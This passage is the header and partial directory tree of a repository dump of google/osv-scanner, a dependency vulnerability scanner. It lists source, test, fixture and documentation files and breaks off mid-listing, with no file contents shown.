Repository: google/osv-scanner Branch: main Commit: 35535698af3e Files: 837 Total size: 13.1 MB Directory structure: gitextract_t0q6fdgj/ ├── .dockerignore ├── .editorconfig ├── .gemini/ │ └── config.yaml ├── .github/ │ ├── PULL_REQUEST_TEMPLATE/ │ │ └── PULL_REQUEST_TEMPLATE.md │ └── workflows/ │ ├── cassettes.yml │ ├── checks.yml │ ├── codeql-analysis.yml │ ├── dependencies.yml │ ├── format-action/ │ │ └── action.yml │ ├── goreleaser-nightly.yml │ ├── goreleaser.yml │ ├── links.yml │ ├── lint-action/ │ │ └── action.yml │ ├── osv-scanner-reusable-pr.yml │ ├── osv-scanner-reusable.yml │ ├── osv-scanner-unified-action.yml │ ├── prerelease-check.yml │ ├── renovate-validator.yml │ ├── scorecards.yml │ ├── snapshots.yml │ ├── staleness.yml │ ├── test-action/ │ │ └── action.yml │ ├── title.yml │ └── zizmor.yml ├── .gitignore ├── .golangci-lint-version ├── .golangci.yaml ├── .goreleaser-nightly.yml ├── .goreleaser.yml ├── .pre-commit-hooks.yaml ├── .prettierignore ├── .prettierrc.json ├── CHANGELOG.md ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── Makefile ├── README.md ├── action.dockerfile ├── actions/ │ ├── reporter/ │ │ └── action.yml │ └── scanner/ │ └── action.yml ├── cmd/ │ ├── osv-reporter/ │ │ ├── main.go │ │ └── main_test.go │ └── osv-scanner/ │ ├── __snapshots__/ │ │ └── main_test.snap │ ├── fix/ │ │ ├── __snapshots__/ │ │ │ └── command_test.snap │ │ ├── command.go │ │ ├── command_test.go │ │ ├── interactive.go │ │ ├── model.go │ │ ├── noninteractive.go │ │ ├── output.go │ │ ├── regen_lockfile.go │ │ ├── state-choose-in-place-patches.go │ │ ├── state-choose-strategy.go │ │ ├── state-in-place-result.go │ │ ├── state-initialize.go │ │ ├── state-relock-result.go │ │ ├── testdata/ │ │ │ ├── in-place-npm/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── override-maven/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ └── pom.xml │ │ │ └── relax-npm/ │ │ │ └── package.json │ │ └── testmain_test.go │ ├── internal/ │ │ ├── cmd/ │ │ │ ├── __snapshots__/ │ │ │ │ └── helpers_test.snap │ │ 
│ ├── helpers.go │ │ │ ├── helpers_test.go │ │ │ ├── run.go │ │ │ └── testmain_test.go │ │ ├── helper/ │ │ │ ├── callanalysis_parser.go │ │ │ ├── callanalysis_parser_test.go │ │ │ ├── flags.go │ │ │ ├── getters.go │ │ │ └── misc.go │ │ └── testcmd/ │ │ ├── case.go │ │ ├── copy.go │ │ ├── git.go │ │ ├── run.go │ │ └── vcr.go │ ├── main.go │ ├── main_test.go │ ├── mcp/ │ │ ├── __snapshots__/ │ │ │ └── integration_test.snap │ │ ├── command.go │ │ ├── configuration-instructions.md │ │ ├── integration_test.go │ │ ├── scan-deps-prompt.md │ │ ├── stats.go │ │ ├── testdata/ │ │ │ └── go-project/ │ │ │ ├── go.mod │ │ │ ├── go.sum │ │ │ ├── main.go │ │ │ ├── osv-scanner-test.toml │ │ │ └── osv-scanner.toml │ │ └── testmain_test.go │ ├── scan/ │ │ ├── __snapshots__/ │ │ │ └── command_test.snap │ │ ├── command.go │ │ ├── command_test.go │ │ ├── image/ │ │ │ ├── __snapshots__/ │ │ │ │ └── command_test.snap │ │ │ ├── command.go │ │ │ ├── command_test.go │ │ │ ├── testdata/ │ │ │ │ ├── alpine-3.18-alpine-release │ │ │ │ ├── alpine-3.18-os-release │ │ │ │ ├── cassettes/ │ │ │ │ │ ├── TestCommand_Docker.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithDefaults.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithoutDefaults.yaml │ │ │ │ │ ├── TestCommand_HtmlFile.yaml │ │ │ │ │ ├── TestCommand_OCIImage.yaml │ │ │ │ │ └── TestCommand_OCIImage_JSONFormat.yaml │ │ │ │ ├── java-fixture/ │ │ │ │ │ └── app/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── pom.xml │ │ │ │ │ └── src/ │ │ │ │ │ └── main/ │ │ │ │ │ └── java/ │ │ │ │ │ └── com/ │ │ │ │ │ └── mycompany/ │ │ │ │ │ └── app/ │ │ │ │ │ └── App.java │ │ │ │ ├── lockfile-fixture/ │ │ │ │ │ ├── alpine-zlib-16.cdx.json │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── package-tracing-fixture/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── python-fixture/ │ │ │ │ │ ├── main.py │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── requirements.txt │ │ │ │ ├── sample-pkgs/ │ │ │ │ │ └── 
fzf_0.29.0-1ubuntu0.1_amd64.deb │ │ │ │ ├── test-alpine-etcshadow.Dockerfile │ │ │ │ ├── test-alpine-sbom.Dockerfile │ │ │ │ ├── test-alpine.Dockerfile │ │ │ │ ├── test-go-binary.Dockerfile │ │ │ │ ├── test-image-with-deprecated/ │ │ │ │ │ ├── Cargo.toml │ │ │ │ │ └── src/ │ │ │ │ │ └── main.rs │ │ │ │ ├── test-image-with-deprecated.Dockerfile │ │ │ │ ├── test-java-full.Dockerfile │ │ │ │ ├── test-node_modules-npm-empty.Dockerfile │ │ │ │ ├── test-node_modules-npm-full.Dockerfile │ │ │ │ ├── test-node_modules-pnpm-empty.Dockerfile │ │ │ │ ├── test-node_modules-pnpm-full.Dockerfile │ │ │ │ ├── test-node_modules-yarn-empty.Dockerfile │ │ │ │ ├── test-node_modules-yarn-full.Dockerfile │ │ │ │ ├── test-package-tracing.Dockerfile │ │ │ │ ├── test-python-empty.Dockerfile │ │ │ │ ├── test-python-full.Dockerfile │ │ │ │ ├── test-ubuntu-20-04.Dockerfile │ │ │ │ ├── test-ubuntu-with-packages.Dockerfile │ │ │ │ ├── test-ubuntu.Dockerfile │ │ │ │ └── ubuntu20-04-unimportant-config.toml │ │ │ └── testmain_test.go │ │ ├── source/ │ │ │ ├── __snapshots__/ │ │ │ │ └── command_test.snap │ │ │ ├── command.go │ │ │ ├── command_test.go │ │ │ ├── testdata/ │ │ │ │ ├── .goignore │ │ │ │ ├── artifact/ │ │ │ │ │ ├── javareach_test.jar │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── bin/ │ │ │ │ │ └── ssh │ │ │ │ ├── call-analysis-go-project/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── call-analysis-go-project-all-uncalled/ │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── go.sum │ │ │ │ │ ├── main.go │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── cassettes/ │ │ │ │ │ ├── TestCommand.yaml │ │ │ │ │ ├── TestCommandNonGit.yaml │ │ │ │ │ ├── TestCommand_CallAnalysis.yaml │ │ │ │ │ ├── TestCommand_CommitSupport.yaml │ │ │ │ │ ├── TestCommand_Config_UnusedIgnores.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithDefaults.yaml │ │ │ │ │ ├── TestCommand_ExplicitExtractors_WithoutDefaults.yaml │ │ │ │ │ ├── TestCommand_GithubActions.yaml │ │ │ │ │ ├── 
TestCommand_HtmlFile.yaml │ │ │ │ │ ├── TestCommand_HtmlFile_Deprecated.yaml │ │ │ │ │ ├── TestCommand_JavareachArchive.yaml │ │ │ │ │ ├── TestCommand_Licenses.yaml │ │ │ │ │ ├── TestCommand_LocalDatabases.yaml │ │ │ │ │ ├── TestCommand_LocalDatabases_AlwaysOffline.yaml │ │ │ │ │ ├── TestCommand_LockfileWithExplicitParseAs.yaml │ │ │ │ │ ├── TestCommand_MoreLockfiles.yaml │ │ │ │ │ ├── TestCommand_Transitive.yaml │ │ │ │ │ ├── TestCommand_WithDetector_OffLinux.yaml │ │ │ │ │ └── TestCommand_WithDetector_OnLinux.yaml │ │ │ │ ├── config-invalid/ │ │ │ │ │ └── osv-scanner-test.toml │ │ │ │ ├── exp-plugins-pkgdeprecate/ │ │ │ │ │ └── deprecated-vuln/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── go-project/ │ │ │ │ │ ├── go-version-config.toml │ │ │ │ │ ├── go.mod │ │ │ │ │ ├── nested/ │ │ │ │ │ │ ├── go-version-config.toml │ │ │ │ │ │ ├── go.mod │ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── locks-git/ │ │ │ │ │ └── osv-scanner.json │ │ │ │ ├── locks-gitignore/ │ │ │ │ │ ├── subdir/ │ │ │ │ │ │ └── test.gitignore │ │ │ │ │ └── test.gitignore │ │ │ │ ├── locks-insecure/ │ │ │ │ │ ├── my-package-lock.json │ │ │ │ │ ├── osv-scanner-custom-git-tag.json │ │ │ │ │ ├── osv-scanner-custom.json │ │ │ │ │ ├── osv-scanner-flutter-deps.json │ │ │ │ │ ├── osv-scanner-with-unscannables.json │ │ │ │ │ ├── osv-scanner.json │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── locks-licenses/ │ │ │ │ │ └── package.json │ │ │ │ ├── locks-many/ │ │ │ │ │ ├── installed │ │ │ │ │ ├── not-a-lockfile.toml │ │ │ │ │ ├── osv-scanner-test.toml │ │ │ │ │ ├── replace-local.mod │ │ │ │ │ └── status │ │ │ │ ├── locks-many-with-insecure/ │ │ │ │ │ ├── alpine.cdx.xml │ │ │ │ │ ├── installed │ │ │ │ │ ├── not-a-lockfile.toml │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── replace-local.mod │ │ │ │ │ └── status │ │ │ │ ├── locks-none/ │ │ │ │ │ └── README.md │ │ │ │ ├── locks-requirements/ │ │ │ │ │ ├── my-requirements.txt │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── requirements-dev.txt │ 
│ │ │ │ ├── requirements-transitive.txt │ │ │ │ │ ├── requirements.prod.txt │ │ │ │ │ ├── requirements.txt │ │ │ │ │ ├── the_requirements_for_test.txt │ │ │ │ │ └── unresolvable-requirements.txt │ │ │ │ ├── locks-scalibr/ │ │ │ │ │ ├── Package.resolved │ │ │ │ │ ├── cabal.project.freeze │ │ │ │ │ ├── depsjson │ │ │ │ │ ├── gems.locked │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── packages.config │ │ │ │ │ └── packages.lock.json │ │ │ │ ├── locks-test-ignore/ │ │ │ │ │ ├── osv-scanner-test.toml │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── maven-transitive/ │ │ │ │ │ ├── abc.xml │ │ │ │ │ ├── encoding.xml │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ ├── parent.xml │ │ │ │ │ ├── pom.xml │ │ │ │ │ └── registry.xml │ │ │ │ ├── osv-scanner-call-analysis-config.toml │ │ │ │ ├── osv-scanner-complex-licenses-config.toml │ │ │ │ ├── osv-scanner-composite-config.toml │ │ │ │ ├── osv-scanner-duplicate-config.toml │ │ │ │ ├── osv-scanner-empty-config.toml │ │ │ │ ├── osv-scanner-expressive-licenses-config.toml │ │ │ │ ├── osv-scanner-invalid-licenses-config.toml │ │ │ │ ├── osv-scanner-partial-ignores-config.toml │ │ │ │ ├── osv-scanner-reasonless-ignores-config.toml │ │ │ │ ├── osv-scanner-unknown-config.toml │ │ │ │ └── sbom-insecure/ │ │ │ │ ├── alpine-zlib-16.cdx.json │ │ │ │ ├── alpine.cdx.xml │ │ │ │ ├── bad-purls.cdx.xml │ │ │ │ ├── only-unimportant.spdx.json │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── postgres-stretch.cdx.xml │ │ │ │ └── with-duplicates.cdx.xml │ │ │ └── testmain_test.go │ │ ├── testdata/ │ │ │ ├── cassettes/ │ │ │ │ └── TestCommand_SubCommands.yaml │ │ │ └── locks-many/ │ │ │ ├── alpine.cdx.xml │ │ │ ├── installed │ │ │ ├── not-a-lockfile.toml │ │ │ ├── osv-scanner.toml │ │ │ ├── replace-local.mod │ │ │ └── status │ │ └── testmain_test.go │ ├── testdata/ │ │ ├── cassettes/ │ │ │ └── Test_run_SubCommands.yaml │ │ └── locks-many/ │ │ ├── alpine.cdx.xml │ │ ├── installed │ │ ├── not-a-lockfile.toml │ │ ├── osv-scanner.toml │ │ ├── replace-local.mod │ │ └── status │ 
├── testmain_test.go │ └── update/ │ ├── __snapshots__/ │ │ └── command_test.snap │ ├── command.go │ ├── command_test.go │ ├── testdata/ │ │ ├── osv-scanner.toml │ │ └── pom.xml │ └── testmain_test.go ├── docs/ │ ├── .gitignore │ ├── 404.html │ ├── Gemfile │ ├── README.md │ ├── _config.yml │ ├── _sass/ │ │ ├── color_schemes/ │ │ │ ├── _variables.scss │ │ │ └── custom_dark.scss │ │ ├── custom/ │ │ │ └── custom.scss │ │ └── highlight/ │ │ └── native.scss │ ├── configuration.md │ ├── contribute.md │ ├── docs.Dockerfile │ ├── experimental.md │ ├── github-action.md │ ├── guided-remediation.md │ ├── index.md │ ├── installation.md │ ├── license-scanning.md │ ├── manual-plugin-selection.md │ ├── migrating-from-scalibr.md │ ├── migration-guide.md │ ├── offline-mode.md │ ├── osv-reporter.md │ ├── output.md │ ├── package-deprecation.md │ ├── scan-image.md │ ├── scan-source.md │ ├── supported_languages_and_lockfiles.md │ └── usage.md ├── exit_code_redirect.sh ├── go.mod ├── go.sum ├── goreleaser-action.dockerfile ├── goreleaser.dockerfile ├── internal/ │ ├── cachedregexp/ │ │ └── regex.go │ ├── ci/ │ │ ├── __snapshots__/ │ │ │ └── vulnerability_result_diff_test.snap │ │ ├── testdata/ │ │ │ ├── not-json.txt │ │ │ ├── results-empty.json │ │ │ ├── results-some.json │ │ │ └── vulns/ │ │ │ ├── test-vuln-results-a-1.json │ │ │ ├── test-vuln-results-a.json │ │ │ ├── test-vuln-results-b.json │ │ │ ├── test-vuln-results-c.json │ │ │ └── test-vuln-results-d.json │ │ ├── testmain_test.go │ │ ├── utility.go │ │ ├── utility_test.go │ │ ├── vulnerability_result_diff.go │ │ └── vulnerability_result_diff_test.go │ ├── clients/ │ │ ├── clientimpl/ │ │ │ ├── licensematcher/ │ │ │ │ └── licensematcher.go │ │ │ ├── localmatcher/ │ │ │ │ ├── localmatcher.go │ │ │ │ ├── testdata/ │ │ │ │ │ └── db/ │ │ │ │ │ ├── file.json │ │ │ │ │ ├── file.yaml │ │ │ │ │ ├── nested-1/ │ │ │ │ │ │ └── osv-1.json │ │ │ │ │ └── nested-2/ │ │ │ │ │ ├── invalid.json │ │ │ │ │ └── osv-2.json │ │ │ │ ├── zip.go │ │ │ │ 
└── zip_test.go │ │ │ └── osvmatcher/ │ │ │ ├── cachedosvmatcher.go │ │ │ ├── osvmatcher.go │ │ │ └── osvmatcher_test.go │ │ └── clientinterfaces/ │ │ ├── licensematcher.go │ │ └── vulnerabilitymatcher.go │ ├── cmdlogger/ │ │ ├── fmt.go │ │ ├── handler.go │ │ ├── interface.go │ │ ├── level.go │ │ ├── level_test.go │ │ ├── scalibr.go │ │ └── static.go │ ├── config/ │ │ ├── config.go │ │ ├── config_internal_test.go │ │ ├── manager.go │ │ └── testdata/ │ │ ├── testdatainner/ │ │ │ ├── innerFolder/ │ │ │ │ └── test.yaml │ │ │ ├── osv-scanner-load-path.toml │ │ │ ├── osv-scanner.toml │ │ │ └── some-manifest.yaml │ │ ├── unknown-key-1.toml │ │ ├── unknown-key-2.toml │ │ ├── unknown-key-3.toml │ │ ├── unknown-key-4.toml │ │ ├── unknown-key-5.toml │ │ ├── unknown-key-6.toml │ │ └── unknown-key-7.toml │ ├── datasource/ │ │ ├── cache.go │ │ ├── cache_test.go │ │ ├── http_auth.go │ │ ├── http_auth_test.go │ │ ├── insights.go │ │ ├── insights_cache.go │ │ ├── insightsalpha.go │ │ ├── maven_registry.go │ │ ├── maven_registry_cache.go │ │ ├── maven_registry_test.go │ │ ├── maven_settings.go │ │ ├── maven_settings_test.go │ │ ├── npm_registry.go │ │ ├── npm_registry_cache.go │ │ ├── npm_registry_test.go │ │ ├── npmrc.go │ │ ├── npmrc_test.go │ │ └── testdata/ │ │ ├── maven_settings/ │ │ │ └── settings.xml │ │ └── npm_registry/ │ │ ├── @fake-registry-a.json │ │ ├── fake-package-2.2.2.json │ │ └── fake-package.json │ ├── depsdev/ │ │ └── depsdev.go │ ├── grouper/ │ │ ├── grouper.go │ │ ├── grouper_models.go │ │ └── grouper_test.go │ ├── identifiers/ │ │ ├── identifiers.go │ │ └── identifiers_test.go │ ├── imodels/ │ │ ├── imodels.go │ │ ├── imodels_test.go │ │ └── results/ │ │ └── scanresults.go │ ├── output/ │ │ ├── __snapshots__/ │ │ │ ├── cyclonedx_test.snap │ │ │ ├── githubannotation_test.snap │ │ │ ├── machinejson_test.snap │ │ │ ├── markdowntable_test.snap │ │ │ ├── output_result_test.snap │ │ │ ├── result_test.snap │ │ │ ├── sarif_internal_test.snap │ │ │ ├── sarif_test.snap 
│ │ │ ├── spdx_test.snap │ │ │ ├── table_test.snap │ │ │ └── vertical_test.snap │ │ ├── cyclonedx.go │ │ ├── cyclonedx_test.go │ │ ├── form.go │ │ ├── form_test.go │ │ ├── githubannotation.go │ │ ├── githubannotation_test.go │ │ ├── helpers_test.go │ │ ├── html/ │ │ │ ├── base_image_template.gohtml │ │ │ ├── deprecated_package_template.gohtml │ │ │ ├── filter_template.gohtml │ │ │ ├── license_summary_template.gohtml │ │ │ ├── package_table_template.gohtml │ │ │ ├── package_view_template.gohtml │ │ │ ├── report_template.gohtml │ │ │ ├── script.js │ │ │ ├── severity_summary_template.gohtml │ │ │ ├── style.css │ │ │ ├── vuln_table_entry_template.gohtml │ │ │ └── vuln_table_template.gohtml │ │ ├── html.go │ │ ├── html_test.go │ │ ├── machinejson.go │ │ ├── machinejson_test.go │ │ ├── markdowntable.go │ │ ├── markdowntable_test.go │ │ ├── output_result.go │ │ ├── output_result_test.go │ │ ├── result.go │ │ ├── result_test.go │ │ ├── sarif.go │ │ ├── sarif_fingerprint_test.go │ │ ├── sarif_internal_test.go │ │ ├── sarif_test.go │ │ ├── sbom/ │ │ │ ├── cyclonedx_1_4.go │ │ │ ├── cyclonedx_1_5.go │ │ │ ├── cyclonedx_1_6.go │ │ │ ├── cyclonedx_common.go │ │ │ └── models.go │ │ ├── spdx.go │ │ ├── spdx_test.go │ │ ├── table.go │ │ ├── table_test.go │ │ ├── testdata/ │ │ │ ├── commit-grouped.json │ │ │ ├── flattened_vulns.json │ │ │ ├── test-vuln-results-a.json │ │ │ └── vuln-grouped.json │ │ ├── testmain_test.go │ │ ├── vertical.go │ │ └── vertical_test.go │ ├── remediation/ │ │ ├── __snapshots__/ │ │ │ ├── in_place_test.snap │ │ │ └── testhelpers_test.snap │ │ ├── in_place.go │ │ ├── in_place_test.go │ │ ├── override.go │ │ ├── override_test.go │ │ ├── relax/ │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ └── relax.go │ │ ├── relax.go │ │ ├── relax_test.go │ │ ├── remediation.go │ │ ├── remediation_test.go │ │ ├── suggest/ │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ └── suggest.go │ │ ├── testdata/ │ │ │ ├── maven-classifier/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── 
pom.xml │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ ├── override-workaround/ │ │ │ │ ├── commons/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── pom.xml │ │ │ │ ├── guava/ │ │ │ │ │ ├── android-to-android/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ ├── jre-to-jre/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ └── none-to-jre/ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── pom.xml │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ ├── santatracker/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── package.json │ │ │ │ ├── universe.yaml │ │ │ │ └── vulns.json │ │ │ └── zeppelin-server/ │ │ │ ├── osv-scanner.toml │ │ │ ├── parent/ │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── parent/ │ │ │ │ │ └── pom.xml │ │ │ │ └── pom.xml │ │ │ ├── pom.xml │ │ │ ├── universe.yaml │ │ │ └── vulns.json │ │ ├── testhelpers_test.go │ │ ├── testmain_test.go │ │ └── upgrade/ │ │ ├── config.go │ │ ├── config_test.go │ │ ├── level.go │ │ └── level_test.go │ ├── reporter/ │ │ ├── cyclonedx.go │ │ ├── format.go │ │ ├── gh-annotations_reporter.go │ │ ├── html_reporter.go │ │ ├── json_reporter.go │ │ ├── reporter.go │ │ ├── reporter_test.go │ │ ├── sarif_reporter.go │ │ ├── spdx.go │ │ ├── table_reporter.go │ │ └── vertical_reporter.go │ ├── resolution/ │ │ ├── __snapshots__/ │ │ │ └── resolve_test.snap │ │ ├── client/ │ │ │ ├── client.go │ │ │ ├── depsdev_client.go │ │ │ ├── helper.go │ │ │ ├── maven_registry_client.go │ │ │ ├── npm_registry_client.go │ │ │ └── override_client.go │ │ ├── clienttest/ │ │ │ └── mock_resolution_client.go │ │ ├── dependency_subgraph.go │ │ ├── dependency_subgraph_test.go │ │ ├── depfile/ │ │ │ └── depfile.go │ │ ├── lockfile/ │ │ │ ├── __snapshots__/ │ │ │ │ └── npm_test.snap │ │ │ ├── lockfile.go │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ ├── npm_v1.go │ │ │ ├── npm_v2.go │ │ │ ├── testdata/ │ │ │ │ ├── npm_registry/ │ │ │ │ │ ├── @fake-registry-a-1.2.4.json │ │ │ │ │ └── @fake-registry-a-2.3.5.json │ │ │ │ ├── npm_v1/ 
│ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ └── package.json │ │ │ │ └── npm_v2/ │ │ │ │ └── osv-scanner.toml │ │ │ └── testmain_test.go │ │ ├── manifest/ │ │ │ ├── __snapshots__/ │ │ │ │ ├── maven_test.snap │ │ │ │ └── npm_test.snap │ │ │ ├── manifest.go │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ ├── npm.go │ │ │ ├── npm_test.go │ │ │ ├── testdata/ │ │ │ │ ├── maven/ │ │ │ │ │ ├── my-app/ │ │ │ │ │ │ ├── osv-scanner.toml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ ├── no-dependency-management.xml │ │ │ │ │ └── parent/ │ │ │ │ │ ├── grandparent/ │ │ │ │ │ │ ├── mismatch.xml │ │ │ │ │ │ └── pom.xml │ │ │ │ │ └── pom.xml │ │ │ │ ├── npm-workspaces/ │ │ │ │ │ ├── package.json │ │ │ │ │ ├── ws/ │ │ │ │ │ │ ├── jquery/ │ │ │ │ │ │ │ └── package.json │ │ │ │ │ │ └── ugh/ │ │ │ │ │ │ └── package.json │ │ │ │ │ └── z/ │ │ │ │ │ └── package.json │ │ │ │ └── package.json │ │ │ └── testmain_test.go │ │ ├── resolve.go │ │ ├── resolve_test.go │ │ ├── testdata/ │ │ │ ├── basic-universe.yaml │ │ │ ├── basic-vulns.json │ │ │ ├── complex-universe.yaml │ │ │ ├── complex-vulns.json │ │ │ ├── diamond-universe.yaml │ │ │ └── diamond-vulns.json │ │ ├── testmain_test.go │ │ └── util/ │ │ └── depsdev.go │ ├── scalibrenricher/ │ │ └── govulncheck/ │ │ └── source/ │ │ ├── govulncheck.go │ │ ├── govulncheck_test.go │ │ ├── result.go │ │ └── testdata/ │ │ ├── go.mod │ │ ├── go.sum │ │ ├── main.go │ │ └── osv-scanner.toml │ ├── scalibrextract/ │ │ ├── filesystem/ │ │ │ └── vendored/ │ │ │ ├── testdata/ │ │ │ │ └── thirdparty/ │ │ │ │ └── zlib/ │ │ │ │ ├── .gitignore │ │ │ │ ├── CMakeLists.txt │ │ │ │ ├── ChangeLog │ │ │ │ ├── FAQ │ │ │ │ ├── INDEX │ │ │ │ ├── LICENSE │ │ │ │ ├── Makefile │ │ │ │ ├── Makefile.in │ │ │ │ ├── README │ │ │ │ ├── adler32.c │ │ │ │ ├── amiga/ │ │ │ │ │ ├── Makefile.pup │ │ │ │ │ └── Makefile.sas │ │ │ │ ├── compress.c │ │ │ │ ├── configure │ │ │ │ ├── crc32.c │ │ │ │ ├── crc32.h │ │ │ │ ├── deflate.c │ │ │ │ ├── deflate.h │ │ │ │ ├── examples/ │ │ │ │ │ ├── README.examples 
│ │ │ │ │ ├── enough.c │ │ │ │ │ ├── fitblk.c │ │ │ │ │ ├── gun.c │ │ │ │ │ ├── gzappend.c │ │ │ │ │ ├── gzjoin.c │ │ │ │ │ ├── gzlog.c │ │ │ │ │ ├── gzlog.h │ │ │ │ │ ├── gznorm.c │ │ │ │ │ ├── zlib_how.html │ │ │ │ │ ├── zpipe.c │ │ │ │ │ ├── zran.c │ │ │ │ │ └── zran.h │ │ │ │ ├── gzclose.c │ │ │ │ ├── gzguts.h │ │ │ │ ├── gzlib.c │ │ │ │ ├── gzread.c │ │ │ │ ├── gzwrite.c │ │ │ │ ├── infback.c │ │ │ │ ├── inffast.c │ │ │ │ ├── inffast.h │ │ │ │ ├── inffixed.h │ │ │ │ ├── inflate.c │ │ │ │ ├── inflate.h │ │ │ │ ├── inftrees.c │ │ │ │ ├── inftrees.h │ │ │ │ ├── make_vms.com │ │ │ │ ├── nintendods/ │ │ │ │ │ ├── Makefile │ │ │ │ │ └── README │ │ │ │ ├── os400/ │ │ │ │ │ ├── README400 │ │ │ │ │ ├── bndsrc │ │ │ │ │ ├── make.sh │ │ │ │ │ └── zlib.inc │ │ │ │ ├── osv-scanner.toml │ │ │ │ ├── qnx/ │ │ │ │ │ └── package.qpg │ │ │ │ ├── test/ │ │ │ │ │ ├── example.c │ │ │ │ │ ├── infcover.c │ │ │ │ │ └── minigzip.c │ │ │ │ ├── treebuild.xml │ │ │ │ ├── trees.c │ │ │ │ ├── trees.h │ │ │ │ ├── uncompr.c │ │ │ │ ├── watcom/ │ │ │ │ │ ├── watcom_f.mak │ │ │ │ │ └── watcom_l.mak │ │ │ │ ├── win32/ │ │ │ │ │ ├── DLL_FAQ.txt │ │ │ │ │ ├── Makefile.bor │ │ │ │ │ ├── Makefile.gcc │ │ │ │ │ ├── Makefile.msc │ │ │ │ │ ├── README-WIN32.txt │ │ │ │ │ ├── VisualC.txt │ │ │ │ │ ├── zlib.def │ │ │ │ │ └── zlib1.rc │ │ │ │ ├── zconf.h │ │ │ │ ├── zconf.h.cmakein │ │ │ │ ├── zconf.h.in │ │ │ │ ├── zlib.3 │ │ │ │ ├── zlib.h │ │ │ │ ├── zlib.pc.cmakein │ │ │ │ ├── zlib.pc.in │ │ │ │ ├── zutil.c │ │ │ │ └── zutil.h │ │ │ ├── vendored.go │ │ │ └── vendored_test.go │ │ ├── language/ │ │ │ ├── javascript/ │ │ │ │ └── nodemodules/ │ │ │ │ └── extractor.go │ │ │ └── osv/ │ │ │ └── osvscannerjson/ │ │ │ ├── extractor.go │ │ │ ├── extractor_test.go │ │ │ ├── metadata.go │ │ │ └── testdata/ │ │ │ ├── empty.json │ │ │ ├── multiple-packages-with-vulns.json │ │ │ ├── not-json.txt │ │ │ ├── one-package-commit.json │ │ │ └── one-package.json │ │ └── vcs/ │ │ ├── gitcommitdirect/ │ │ │ └── extractor.go │ 
│ └── gitrepo/ │ │ ├── extractor.go │ │ ├── extractor_test.go │ │ └── testdata/ │ │ ├── example-clean/ │ │ │ └── git-hidden/ │ │ │ ├── HEAD │ │ │ ├── config │ │ │ ├── description │ │ │ └── info/ │ │ │ └── exclude │ │ ├── example-git/ │ │ │ ├── a.txt │ │ │ └── git-hidden/ │ │ │ ├── COMMIT_EDITMSG │ │ │ ├── HEAD │ │ │ ├── config │ │ │ ├── description │ │ │ ├── index │ │ │ ├── info/ │ │ │ │ └── exclude │ │ │ ├── logs/ │ │ │ │ ├── HEAD │ │ │ │ └── refs/ │ │ │ │ └── heads/ │ │ │ │ └── main │ │ │ ├── objects/ │ │ │ │ ├── 16/ │ │ │ │ │ └── b14f5da9e2fcd6f3f38cc9e584cef2f3c90ebe │ │ │ │ ├── 4b/ │ │ │ │ │ └── 825dc642cb6eb9a060e54bf8d69288fbee4904 │ │ │ │ ├── 86/ │ │ │ │ │ └── 2ac4bd2703b622e85f29f55a2fd8cd6caf8182 │ │ │ │ └── bf/ │ │ │ │ └── 8fbfe5a434c007b640c12d920683cb19a7b2b9 │ │ │ └── refs/ │ │ │ └── heads/ │ │ │ └── main │ │ └── example-not-git/ │ │ ├── a.txt │ │ └── git-hidden/ │ │ └── b.txt │ ├── scalibrplugin/ │ │ ├── __snapshots__/ │ │ │ └── resolve_test.snap │ │ ├── presets.go │ │ ├── resolve.go │ │ ├── resolve_test.go │ │ └── testmain_test.go │ ├── sourceanalysis/ │ │ ├── __snapshots__/ │ │ │ ├── go_test.snap │ │ │ ├── integration_test.snap │ │ │ └── rust_test.snap │ │ ├── go.go │ │ ├── go_test.go │ │ ├── govulncheck/ │ │ │ └── result.go │ │ ├── integration_test.go │ │ ├── rust.go │ │ ├── rust_test.go │ │ ├── sourceanalysis.go │ │ ├── testdata/ │ │ │ ├── go-integration/ │ │ │ │ ├── .goignore │ │ │ │ ├── GO-2021-0053.json │ │ │ │ ├── GO-2023-1558.json │ │ │ │ ├── GO-2023-2382.json │ │ │ │ └── test-project/ │ │ │ │ ├── go.mod │ │ │ │ ├── go.sum │ │ │ │ ├── 